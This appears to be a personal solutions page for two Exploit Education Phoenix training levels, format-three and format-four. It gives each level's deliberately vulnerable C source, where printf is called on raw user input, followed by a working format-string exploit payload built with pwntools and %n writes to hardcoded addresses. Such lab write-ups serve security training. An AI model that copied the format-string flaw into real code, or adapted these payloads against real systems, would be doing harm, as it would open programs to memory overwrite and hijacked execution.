BuringStraw

/*
 * phoenix/format-three, by https://exploit.education
 *
 * Can you change the "changeme" variable to a precise value?
 *
 * How do you fix a cracked pumpkin? With a pumpkin patch.
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "歡迎來到 " LEVELNAME "，由 https://exploit.education 提供"

int changeme;

void bounce(char *str) {
  printf(str);
}

int main(int argc, char **argv) {
  char buf[4096];
  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);

  if (changeme == 0x64457845) {
    puts("做得好，'changeme' 變數已經正確修改！");
  } else {
    printf(
        "下次再努力 - 得到了 0x%08x，但想要的是 0x64457845！\n", changeme);
  }

  exit(0);
}

from pwn import *
p = process("/opt/phoenix/i486/format-three")
p.sendline("\x44\x98\x04\x08\x45\x98\x04\x08\x46\x98\x04\x08\x47\x98\x04\x08"+"A"*(0x145-99-4*4)+"%08x "*11+"%n"+"a"*((0x178-0x145))+"%n"+"a"*(0x245-0x178)+"%n"+"a"*(0x264-0x245)+"%n")
p.interactive()

/*
 * phoenix/format-four, by https://exploit.education
 *
 * Can you affect code execution? Once you've got congratulations() to
 * execute, can you then execute your own shell code?
 *
 * Did you get a hair cut?
 * No, I got all of them cut.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "歡迎來到 " LEVELNAME "，由 https://exploit.education 提供"

void bounce(char *str) {
  printf(str);
  exit(0);
}

void congratulations() {
  printf("做得好，你重定向了程式執行！\n");
  exit(0);
}

int main(int argc, char **argv) {
  char buf[4096];

  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);
}

payload="\xe4\x97\x04\x08\xe5\x97\x04\x08\xe6\x97\x04\x08\xe7\x97\x04\x08"+"A"*(0x103-99-4*4)+"%08x "*11+"%n"+"a"*((0x185-0x103))+"%n"+"a"*(0x204-0x185)+"%n"+"a"*(0x208-0x204)+"%n"
open("/home/user/buf","wb").write(payload)